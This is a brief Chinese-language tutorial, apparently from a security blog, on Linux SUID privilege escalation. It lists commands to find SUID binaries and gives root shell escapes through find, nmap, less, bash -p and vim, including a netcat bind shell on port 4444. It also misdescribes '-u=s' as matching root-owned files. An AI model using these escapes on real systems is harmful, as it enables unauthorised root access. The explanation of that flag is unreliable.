概述
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限,如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具进行root提权。
目前可以用来提权的Linux可执行文件列表
- nmap
- vim
- find
- bash
- more
- less
- nano
- cp
用于查找SUID命令可执行文件的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
/从文件系统的根部开始并找到每个目录
-perm 表示搜索的权限
-u=s 表示查找root用户拥有的文件
-type 表示我们正在寻找的文件类型
f 表示常规文件,不是目录或特殊文件
2 表示该进程的第二个文件描述符,既stderr(标准错误)
‘>’ 表示重定向
‘> /dev/null 是一个特殊的文件系统对象,他将丢弃写入的所有内容
find
如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行
大部分的linux系统都会安装nc,所以可以使用nc将权限提升到root
find su_fn -exec netcat -lvvp 4444 -e /bin/sh \;
连接目标及端口获得shell
Nmap
Nmap(2.02-5.21)版本有交互模式,允许用户执行shell命令。
interactive参数进入交互模式
!sh以shell命令模式交互
扫描二维码关注公众号,回复:
11637777 查看本文章
less
less /etc/passwd
!/bin/sh
bash
以下命令可以以root权限打开bash shell
bash -p
bash-3.2# whoami
root
vim
如果vim以SUID运行,就会继承root用户的权限读取系统中所有文件
vim.tiny
:set shell=/bin/sh
:shell
人生漫漫其修远兮,网安无止境。
一同前行,加油!